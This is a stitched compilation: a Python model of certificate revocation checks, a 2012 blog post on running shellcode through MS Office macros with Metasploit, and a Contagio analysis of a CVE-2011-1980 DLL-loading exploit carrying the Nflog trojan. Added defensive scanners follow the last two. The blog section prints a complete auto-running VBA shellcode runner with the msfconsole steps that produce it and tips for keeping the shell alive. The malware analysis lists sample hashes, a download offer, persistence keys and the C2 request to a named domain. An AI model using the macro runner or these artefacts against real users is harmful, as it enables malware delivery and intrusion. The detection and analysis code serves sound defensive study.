Source: Symantec: Stripping online certificate revocation checks from Chrome is misguided | Security - InfoWorld
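The revocation-check policies the article argues over (soft-fail, hard-fail, OCSP stapling and a locally maintained revoked list), modelled as an added example that is not code from the article, Chrome or any CA. It contains no OCSP parsing; the responder outcomes, the staple fields and the cached list are constructed assumptions, and it shows which policy still lets a revoked certificate through when the responder is blocked.

```python
"""Decision model for certificate revocation checking.

Added example (not the article's, Chrome's or any CA's code): it models the
client-side decision only, with no ASN.1/OCSP parsing. Responder results,
staples and the local revoked list are constructed inputs.
"""
from dataclasses import dataclass
from enum import Enum
from typing import Callable, Optional, Set


class Status(Enum):
    GOOD = "good"
    REVOKED = "revoked"
    UNREACHABLE = "unreachable"   # timeout, captive portal, or a query dropped on the path


@dataclass
class Staple:
    """OCSP response the server fetched from its CA and sends along with its certificate."""
    status: Status
    this_update: int       # when the CA produced it (epoch seconds)
    next_update: int       # end of validity; a staple past this point is stale
    ca_signature_ok: bool  # result of verifying the CA's signature over the response


def check_revocation(serial: str, responder: Callable[[str], Status], now: int,
                     mode: str, staple: Optional[Staple] = None,
                     local_revoked: Optional[Set[str]] = None) -> bool:
    """Return True when the TLS session may proceed, False when it must be blocked."""
    assert mode in ("soft-fail", "hard-fail")
    # A locally cached list (the approach Chrome announced) needs no network round trip,
    # but only covers what the list's maintainer chose to push out.
    if local_revoked is not None and serial in local_revoked:
        return False
    # A stapled response is trusted only if the CA signature verifies and it is inside
    # its validity window; a stale or unsigned staple is treated as no staple at all.
    if staple and staple.ca_signature_ok and staple.this_update <= now < staple.next_update:
        return staple.status is Status.GOOD
    # Otherwise the client has to contact the CA's responder itself.
    status = responder(serial)
    if status is Status.UNREACHABLE:
        # soft-fail: no answer means "proceed"; hard-fail: no answer means "block".
        return mode == "soft-fail"
    return status is Status.GOOD


# Constructed CA responder: serial "A1" has been revoked, "B2" is still good.
def ca_responder(serial: str) -> Status:
    return Status.REVOKED if serial == "A1" else Status.GOOD


def blocked_responder(serial: str) -> Status:
    """A captive portal or on-path attacker that swallows every OCSP query."""
    return Status.UNREACHABLE


def run_scenarios(now: int = 1_000_000) -> dict:
    """Exercise the revoked certificate "A1" under each policy; returns name -> proceed?"""
    fresh_revoked = Staple(Status.REVOKED, now - 60, now + 3600, True)
    stale_good = Staple(Status.GOOD, now - 90_000, now - 86_400, True)   # expired yesterday
    forged_good = Staple(Status.GOOD, now - 60, now + 3600, False)        # signature does not verify
    return {
        "responder-up,soft-fail": check_revocation("A1", ca_responder, now, "soft-fail"),
        "responder-up,hard-fail": check_revocation("A1", ca_responder, now, "hard-fail"),
        "blocked,soft-fail": check_revocation("A1", blocked_responder, now, "soft-fail"),
        "blocked,hard-fail": check_revocation("A1", blocked_responder, now, "hard-fail"),
        "blocked,fresh-staple": check_revocation("A1", blocked_responder, now, "hard-fail", staple=fresh_revoked),
        "blocked,stale-staple": check_revocation("A1", blocked_responder, now, "hard-fail", staple=stale_good),
        "blocked,forged-staple": check_revocation("A1", blocked_responder, now, "soft-fail", staple=forged_good),
        "blocked,local-list-hit": check_revocation("A1", blocked_responder, now, "soft-fail", local_revoked={"A1"}),
        "blocked,local-list-miss": check_revocation("A1", blocked_responder, now, "soft-fail", local_revoked={"Z9"}),
        # A good certificate with a fresh GOOD staple proceeds under hard-fail even though
        # the responder is unreachable: stapling removes the availability dependence.
        "good-cert,blocked,hard-fail,staple": check_revocation(
            "B2", blocked_responder, now, "hard-fail", staple=Staple(Status.GOOD, now - 60, now + 3600, True)),
    }


if __name__ == "__main__":
    for name, proceed in run_scenarios().items():
        print(f"{name:40s} -> {'PROCEED' if proceed else 'BLOCK'}")
```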
-
Direct Shellcode Execution via MS Office Macros with Metasploit

Friday, February 3, 2012

scriptjunkie recently had a post on Direct shellcode execution in MS Office macros. I didn't see it go into the metasploit trunk, but it's there. How to generate macro code is in the post but I'll repost it here so I don't have to go looking for it elsewhere later. He even has a sample to start with so you can see how it works. Just enable the Developer tab, then hit up the Visual Basic button to change code around.

msf > use payload/windows/exec
msf payload(exec) > set CMD calc
CMD => calc
msf payload(exec) > set EXITFUNC thread
EXITFUNC => thread
msf payload(exec) > generate -t vba

#If Vba7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As LongPtr, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As LongPtr
#Else
Private Declare Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As Long, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As Long, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As Long
#EndIf

Sub Auto_Open()
    Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long
#If Vba7 Then
    Dim Xlbufvetp As LongPtr
#Else
    Dim Xlbufvetp As Long
#EndIf
    Hyeyhafxp = Array(232,137,0,0,0,96,137,229,49,210,100,139,82,48,139,82,12,139,82,20, _
    139,114,40,15,183,74,38,49,255,49,192,172,60,97,124,2,44,32,193,207, _
    13,1,199,226,240,82,87,139,82,16,139,66,60,1,208,139,64,120,133,192, _
    116,74,1,208,80,139,72,24,139,88,32,1,211,227,60,73,139,52,139,1, _
    214,49,255,49,192,172,193,207,13,1,199,56,224,117,244,3,125,248,59,125, _
    36,117,226,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4, _
    139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18, _
    235,134,93,106,1,141,133,185,0,0,0,80,104,49,139,111,135,255,213,187, _
    224,29,42,10,104,166,149,189,157,255,213,60,6,124,10,128,251,224,117,5, _
    187,71,19,114,111,106,0,83,255,213,99,97,108,99,0)
    Xlbufvetp = VirtualAlloc(0, UBound(Hyeyhafxp), &H1000, &H40)
    For Zolde = LBound(Hyeyhafxp) To UBound(Hyeyhafxp)
        Wyzayxya = Hyeyhafxp(Zolde)
        Lezhtplzi = RtlMoveMemory(Xlbufvetp + Zolde, Wyzayxya, 1)
    Next Zolde
    Lezhtplzi = CreateThread(0, 0, Xlbufvetp, 0, 0, 0)
End Sub

Sub AutoOpen()
    Auto_Open
End Sub

Sub Workbook_Open()
    Auto_Open
End Sub

The important thing to remember is that with this method you'll NOT be dropping a vbs or bin and you'll be running inside of excel/word/whatever, so you need to make sure you set up an autorunscript or macro to migrate out of the process, else you'll be losing the shell as soon as they exit the office application.

Posted by CG at 5:21 PM

Source: Carnal0wnage & Attack Research Blog: Direct Shellcode Execution via MS Office Macros with Metasploit
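A static triage check for the macro pattern shown above (Win32 declarations for VirtualAlloc, RtlMoveMemory and CreateThread, an auto-run Sub and a large literal byte array), written as an added defensive example that is neither Metasploit code nor from the original post. The macro text it scans is a constructed stand-in whose array is an inert number sequence, not the generated payload, and the score thresholds are assumptions.

```python
"""Static triage of VBA macro source for the in-memory shellcode-runner pattern.

Added example, not from the post or from Metasploit. It flags the combination of
the three Win32 declarations the generated macro depends on, an auto-run entry
point, a large all-numeric Array(...) literal and the PAGE_EXECUTE_READWRITE
flag (&H40). The sample macros below are constructed; the "runner" sample uses
an inert 0..79 sequence in place of shellcode bytes.
"""
import re
from dataclasses import dataclass, field

RUNNER_APIS = ("virtualalloc", "rtlmovememory", "createthread")
AUTO_RUN_SUBS = {"auto_open", "autoopen", "workbook_open", "document_open", "autoexec"}

DECLARE_RE = re.compile(r'Declare\s+(?:PtrSafe\s+)?Function\s+(\w+)\s+Lib\s+"([^"]+)"', re.I)
SUB_RE = re.compile(r'^\s*(?:Private\s+|Public\s+)?Sub\s+(\w+)\s*\(', re.I | re.M)
ARRAY_RE = re.compile(r'\bArray\s*\(([^)]*)\)', re.I)
RWX_RE = re.compile(r'&H40\b', re.I)  # PAGE_EXECUTE_READWRITE passed to VirtualAlloc


@dataclass
class MacroFindings:
    declared_apis: dict = field(default_factory=dict)  # lower-cased name -> library
    auto_run: list = field(default_factory=list)
    largest_byte_array: int = 0
    rwx_alloc: bool = False

    @property
    def score(self) -> int:
        s = sum(1 for api in RUNNER_APIS if api in self.declared_apis)
        s += 1 if self.auto_run else 0
        s += 1 if self.largest_byte_array >= 64 else 0   # assumed threshold
        s += 1 if self.rwx_alloc else 0
        return s

    @property
    def verdict(self) -> str:
        if self.score >= 5:
            return "shellcode-runner"
        return "suspicious" if self.score >= 3 else "clean"


def analyse_vba(source: str) -> MacroFindings:
    # Join VBA line continuations (" _" + newline) so arrays and Declares are single lines.
    logical = re.sub(r'\s+_\s*\r?\n\s*', ' ', source)
    f = MacroFindings()
    for name, lib in DECLARE_RE.findall(logical):
        f.declared_apis[name.lower()] = lib.lower()
    f.auto_run = [s for s in SUB_RE.findall(logical) if s.lower() in AUTO_RUN_SUBS]
    for body in ARRAY_RE.findall(logical):
        items = [x.strip() for x in body.split(',') if x.strip()]
        if items and all(x.isdigit() and int(x) <= 255 for x in items):
            f.largest_byte_array = max(f.largest_byte_array, len(items))
    f.rwx_alloc = "virtualalloc" in f.declared_apis and bool(RWX_RE.search(logical))
    return f


# Constructed sample with the same shape as the generated macro, inert bytes.
_INERT_BYTES = ", _\n    ".join(
    ", ".join(str(n) for n in range(k, k + 20)) for k in range(0, 80, 20))

SAMPLE_RUNNER = '''#If Vba7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal A As Long, ByVal B As Long, ByVal C As LongPtr, D As Long, ByVal E As Long, F As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal A As Long, ByVal B As Long, ByVal C As Long, ByVal D As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal A As LongPtr, ByRef B As Any, ByVal C As Long) As LongPtr
#EndIf

Sub Auto_Open()
    Dim Buf As Variant, P As LongPtr, I As Long
    Buf = Array(''' + _INERT_BYTES + ''')
    P = VirtualAlloc(0, UBound(Buf), &H1000, &H40)
    For I = LBound(Buf) To UBound(Buf)
        RtlMoveMemory P + I, Buf(I), 1
    Next I
    CreateThread 0, 0, P, 0, 0, 0
End Sub

Sub Workbook_Open()
    Auto_Open
End Sub
'''

SAMPLE_BENIGN = '''Sub FormatReport()
    Dim Names As Variant
    Names = Array("Q1", "Q2", "Q3")
    MsgBox "Report formatted"
End Sub
'''

if __name__ == "__main__":
    for label, src in (("runner", SAMPLE_RUNNER), ("benign", SAMPLE_BENIGN)):
        r = analyse_vba(src)
        print(f"{label}: verdict={r.verdict} score={r.score} apis={sorted(r.declared_apis)} "
              f"auto_run={r.auto_run} array={r.largest_byte_array}")
```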
-
Feb 9 CVE-2011-1980 MSOffice DLL Loading vulnerability + Trojan Nflog

Wednesday, February 15, 2012

On February 9, 2012 Symantec disclosed that the previously patched MS Office insecure library loading vulnerability was exploited in the wild. DLL loading vulnerabilities were used in targeted attacks at least with two other exploits in 2011 and they did not reach epidemic proportions like it happened with CVE-2010-3333 RTF or some of the Adobe PDF exploits. I refer to Contagio: Sept. 23 CVE-2011-1991 type (1) deskpan.dll Windows components DLL loading vulnerability and Contagio: Apr 13 CVE-2011-2100 PDF - Adobe DLL Loading Vulnerability - Agenda.7z

DLL search order hijacking exploits had and will have many new reincarnations because of the DLL loading preference order - Current Working Directory is preferred for most DLL files. You can read more about the root of these problems (not necessarily related to MS Office but in general) in M-unition: DLL Search Order Hijacking Revisited by Nick Harbour

As described in the Symantec article, fputlsat.dll must be present in the same directory as the Word document in order to be activated by the ActiveX control embedded in the Word document. The payload of this sample is a backdoor trojan Nflog.
Common Vulnerabilities and Exposures (CVE) number

CVE-2011-1980 Untrusted search path vulnerability in Microsoft Office 2003 SP3 and 2007 SP2 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .doc, .ppt, or .xls file, aka "Office Component Insecure Library Loading Vulnerability."

Microsoft Security Bulletin MS11-073 - Important: Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2587634)

Symantec: New Targeted Attack Using Office Exploit Found In The Wild by Joji Hamada

General File Information

File: 275c5ac2067d17187a71b94ccfdc4608.doc
Size: 22016
MD5: 275C5AC2067D17187A71B94CCFDC4608

File: fputlsat.dll
Size: 126976
MD5: 60068812B59E58D6338AAEBD649F9020

Download

Download as a password protected archive (email me if you need the password)

File Description

File: 275c5ac2067d17187a71b94ccfdc4608.doc
Size: 22016
MD5: 275C5AC2067D17187A71B94CCFDC4608

[Screenshot: Before the document is open - DLL file is present in the same directory]

The Word document has an embedded macro - ActiveX List View Form Control, a very common ActiveX control, which calls fputlsat.dll "Microsoft Office FrontPage Client Utility Library". There is nothing unusual about this behavior, you can read more about this particular control here "Using the ListView ActiveX Control" and it is normal for it to call Frontpage libraries. The vulnerability presents itself in the fact that a DLL located in the same folder as the Word document will be used before the legitimate DLL in C:\Program Files\Microsoft Office\Office\.. or other directories.

[Screenshot: After the document is open. DLL file is renamed to Thumbs.db]

[Screenshot: Activity after the exploit launch]

Examination of the ActiveX component shows the original path of the macro/control as it existed on the author's computer C:\Documents and Settings\Bandit\Local Settings\Temp\Word8.0\FPDTC.DLL (nice user name)

Office 8.0 is Office 97 (yes, eons ago) and FPDTC.DLL is a Front Page Design Time Control that was used around 2000-2001. Considering this, I wonder if this vulnerability not only existed but also was used with minor tweaks through all versions of MS Office - starting with Office 97 and ending with Office 2010 we finally found it out. Perhaps, Microsoft Office/VB gurus will be able to answer and / or correct me.

[Screenshot: List view control]

Upon launch, the user is presented with a choice to Run or not to run ActiveX controls. By that time the exploit already worked and the files were dropped/renamed. Answering Yes will allow the dropped payload iede32.ocx to run.

[Screenshot: ActiveX prompt]

The picture below shows locations of the dropped file and the registry changes.
[Screenshot: SVCHOST.EXE process injection]

File: fputlsat.dll
Size: 126976
MD5: 60068812B59E58D6338AAEBD649F9020

fputlsat.dll (thumbs.db) strings

Unicode Strings:
---------------------------------------------------------------------------
Adobe Photoshop ---- ???
Adobe Photoshop 6.0 ----- ?
Unknown if these artifacts mean anything. Photoshop is just as old. May be same DLL code was used for other products.

VS_VERSION_INFO
StringFileInfo
040404b0
Comments
CompanyName Microsoft Corporation
FileDescription Microsoft Office FrontPage Client Utility Library
FileVersion 11.0.5510.0
InternalName FP40CUTL
LegalCopyright Copyright© Microsoft Corporation 2003. All rights reserved.
LegalTrademarks
OriginalFilename FP40CUTL
PrivateBuild
ProductName FP40CUTL.DLL -- Frontpage 2000 file. Wonder if Word 2000 was affected too.
ProductVersion 11, 0, 0, 0
SpecialBuild
VarFileInfo
Translation

Created Files

File: iede32.ocx
Size: 13824
MD5: D4859FC951652B3C9657F8621D4DB625
Virustotal

The trojan starts its activity POST /NfLog/Nfile.asp, this trojan is not new, for example there were Zero day CVE-2011-2462 files carrying the same trojan.
The service modified is irmon (frequently abused by these types of attacks - here is a ThreatExpert report of a very common APT backdoor using the same service).

List of strings
Key Name: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Irmon\Parameters
Class Name: <NO CLASS>
Last Write Time: 2/14/2012 - 1:40 AM
Value 0
Name: ServiceDll
Type: REG_EXPAND_SZ
Data: C:\WINDOWS\system32\iede32.ocx

Traffic

In my case, CC was not active or at least I didn't receive any traffic but you can see the initial POST and the domain name.

POST /IElog/TestURL.asp HTTP/1.0
User-Agent: www
Host: www.aviraco.com
Content-Length: 10
Pragma: no-cache

1234567890

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Tue, 14 Feb 2012 05:39:57 GMT
Connection: close
Content-Length: 39

<h1>Bad Request (Invalid Hostname)</h1>

Domain Name : aviraco.com
PunnyCode : aviraco.com
Creation Date : 2011-03-30 10:31:10
Updated Date : 2011-03-30 10:31:10
Expiration Date : 2012-03-30 10:31:10
Registrant:
Organization : zhipengwang
Name : zhipengwang
Address : Zhongguancun Hailong Building, Room 1005
City : haidianqu
Province/State : beijingshi
Country : china
Postal Code : 100083

216.83.63.147 Host reachable, 408 ms. average
216.83.32.0 - 216.83.63.255
Ethr.Net LLC
7960B Soquel Dr. #417
Aptos CA 95003
United States

IP Address History
Event Date   Action          Pre-Action IP    Post-Action IP
2009-12-28   New             -none-           174.37.172.68
2010-09-13   Change          174.37.172.68    67.228.81.181
2010-09-24   Change          67.228.81.181    174.37.172.68
2011-02-02   Change          174.37.172.68    67.228.81.180
2011-02-13   Not Resolvable  67.228.81.180    -none-
2011-10-14   New             -none-           98.126.113.28
2011-10-25   Change          98.126.113.28    216.83.63.14

Registrar History
Date         Registrar
2009-12-26   Name.com aka DomainSite
2011-03-29   Xin Net

Name Server History
Event Date   Action     Pre-Action Server   Post-Action Server
2009-12-28   New        -none-              Name.com
2011-02-08   Delete     Name.com            -none-
2011-03-31   New        Xinnet.cn           Xinnetdns.com
2011-12-13   Transfer   Xinnetdns.com       Xincache.com

RR
www.comedns.com.    A   216.83.63.147
www.creamofa.com.   A   216.83.63.147

Automated Scans

Virustotal
Source: contagio: Feb 9 CVE-2011-1980 MSOffice DLL Loading vulnerability + Trojan Nflog
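A directory check for the two artefacts the post describes (a DLL planted beside an Office document so the current-working-directory search order picks it up, and a PE file renamed to Thumbs.db), written as an added example that is not code from Contagio or Symantec. The sample tree, the minimal PE stubs and the OLE2 stand-ins are constructed in a temp directory; the file name fputlsat.dll is taken from the post.

```python
"""Find DLL-planting artefacts next to Office documents (the CVE-2011-1980 pattern).

Added example, not from the Contagio post. Two checks:
  * dll-beside-document: a .dll/.ocx sitting in a folder that also holds Office files,
    the location the DLL search order consults before the real Office directory;
  * pe-masquerading: a file with a non-executable name (e.g. Thumbs.db) that
    carries an MZ/PE header, as the renamed dropper did.
The sample tree built by build_sample_tree() is constructed; its "PE" files are
header-only stubs that is_pe() accepts but Windows could never load.
"""
import os
import struct
import tempfile
from typing import List, Tuple

OFFICE_EXTS = {".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx"}
LOADABLE_EXTS = {".dll", ".ocx"}
PE_EXTS = LOADABLE_EXTS | {".exe", ".sys", ".scr"}   # names under which a PE header is expected
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"     # legacy .doc/.xls and real Thumbs.db files


def is_pe(path: str) -> bool:
    """True when the file has an MZ header whose e_lfanew points at a 'PE\\0\\0' signature."""
    try:
        with open(path, "rb") as fh:
            dos = fh.read(0x40)
            if len(dos) < 0x40 or dos[:2] != b"MZ":
                return False
            e_lfanew = struct.unpack_from("<I", dos, 0x3C)[0]
            fh.seek(e_lfanew)
            return fh.read(4) == b"PE\0\0"
    except OSError:
        return False


def scan_directory(root: str) -> List[Tuple[str, str]]:
    """Walk root; return (finding-kind, path) pairs."""
    findings = []
    for dirpath, _, files in os.walk(root):
        exts = {os.path.splitext(f)[1].lower() for f in files}
        beside_office_doc = bool(exts & OFFICE_EXTS)
        for name in sorted(files):
            path = os.path.join(dirpath, name)
            ext = os.path.splitext(name)[1].lower()
            if beside_office_doc and ext in LOADABLE_EXTS:
                findings.append(("dll-beside-document", path))
            if ext not in PE_EXTS and is_pe(path):
                findings.append(("pe-masquerading", path))
    return findings


def _write(path: str, data: bytes) -> None:
    with open(path, "wb") as fh:
        fh.write(data)


def make_pe_stub(path: str) -> None:
    """Header-only stub: MZ, e_lfanew = 0x40, then 'PE\\0\\0'. Not a loadable image."""
    dos = bytearray(b"MZ" + b"\0" * 62)
    struct.pack_into("<I", dos, 0x3C, 0x40)
    _write(path, bytes(dos) + b"PE\0\0" + b"\0" * 20)


def build_sample_tree() -> str:
    """Constructed layout: one folder mirroring the post's sample, one clean folder."""
    root = tempfile.mkdtemp(prefix="dllplant_")
    attach = os.path.join(root, "attachments")
    os.makedirs(attach)
    _write(os.path.join(attach, "report.doc"), OLE2_MAGIC + b"\0" * 24)
    make_pe_stub(os.path.join(attach, "fputlsat.dll"))   # planted, named after a real Office library
    make_pe_stub(os.path.join(attach, "Thumbs.db"))      # the same DLL after the rename
    clean = os.path.join(root, "clean")
    os.makedirs(clean)
    _write(os.path.join(clean, "notes.doc"), OLE2_MAGIC + b"\0" * 24)
    _write(os.path.join(clean, "Thumbs.db"), OLE2_MAGIC + b"\0" * 24)   # genuine thumbnail cache is OLE2
    return root


def scan_sample() -> List[str]:
    """Build the sample tree and return findings as 'kind:relative/path' strings."""
    root = build_sample_tree()
    return [f"{kind}:{os.path.relpath(p, root).replace(os.sep, '/')}"
            for kind, p in scan_directory(root)]


if __name__ == "__main__":
    for line in scan_sample():
        print(line)
```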